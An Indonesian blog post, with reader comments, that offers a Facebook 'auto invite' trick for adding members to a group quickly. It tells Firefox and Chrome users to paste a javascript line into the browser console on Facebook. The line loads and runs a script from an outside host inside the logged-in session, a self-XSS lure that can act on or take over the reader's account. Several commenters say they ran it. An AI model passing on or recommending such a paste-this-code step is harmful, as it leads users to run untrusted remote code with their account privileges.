Rabu, Agustus 15, 2012

auto invite grup 2012 Cara Menambahkan Anggota Group Dengan Cepat








Baru! Tampilan lebih bagus dan lebih cepat prosesnya, dibuat oleh Dunia maya dengan memakai script AingCreation, diperbaharui dan dimodifikasi oleh Dunia maya. Silahkan di
Coba!



Untuk Pengguna Mozzila Firefox

Buka Facebook Pergi ke Group yang dituju
1. Tekan tombol CTRL + SHIFT + K  Lalu copy kode yang berwarna merah


javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://duniamaya1.wap.sh/autoinvite2012';})();


2. Tekan Enter

screenshoot :








sehingga akan muncul tampilan seperti ini tunggu hingga prosesnya selesai










Untuk pengguna Google Chrome
Buka Facebook Pergi ke Group yang dituju
1. Klik Kanan pada mouse
2. pilih Inspect Element
3. Pilih Console4. Lalu copy code berwarna biru ini

javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://duniamaya1.wap.sh/autoinvite2012';})();


3. Tekan enter



screenshoot






sehingga akan muncul tampilan seperti ini tunggu hingga prosesnya selesai







Silahkan yg baru coba-coba untuk memakainya di group ini, supaya tidak salah langkah saat di group lain. Terimakasih

nb :
kodenya bisa digunakan untuk semua grup apa ajah ... asalkan udah bergabung
nb:
karena blog ini tidak bisa di klik kanan cara copy codenya blok codenya lalu tekan Ctrl C  pada keyboard


9 komentar:

  1. ini yg saya cari, akhirnya ketemu juga, makasih tutornya ijin nyoba bro...

    BalasHapus
  2. sip kk ,,, jangan lupa share ,, berbagi itu indah ^_^

    BalasHapus
  3. Izin copas bro,, untuk blog gw,,..
    nanti aku buat sumbernya..

    BalasHapus
  4. copas ajah dah broo,,, klw ada link sumbernya gpp

    BalasHapus
  5. Hebat Radill..
    Confrim fb ane..
    kifli infinity..
    makasih ya bro..
    thanks ilmu nya..
    saya mw pakai auto anggota group jadi ribuan.
    tapi suruh add admin nya dulu bro.
    TOLONG di confrim FB ANE BOSSS..
    MAKASIH..
    email fb: zulkifliputeh22@yahoo.com
    sukses selalu..!

    BalasHapus
  6. alhamdulilah gan, ternyata kode work. untuk rasa terima kasih akan saya sebarkan melalui gorup yang baru saya buat.

    BalasHapus
  7. document.body kok bisa gitu ya,,entar bisa ngakses fb gwa dong..

    BalasHapus

Cara Berkomentar bagi yang tidak memiliki blog:
1. Klik select profile --> pilih Name/URL
2. Isi nama kamu dan isi dengan alamat fb kamu
3. Klik Lanjutkan
4. Ketik komentar kamu dan publish
Form komentar ini tanpa moderasi dan verifikasi, jangan kirim SPAM ya..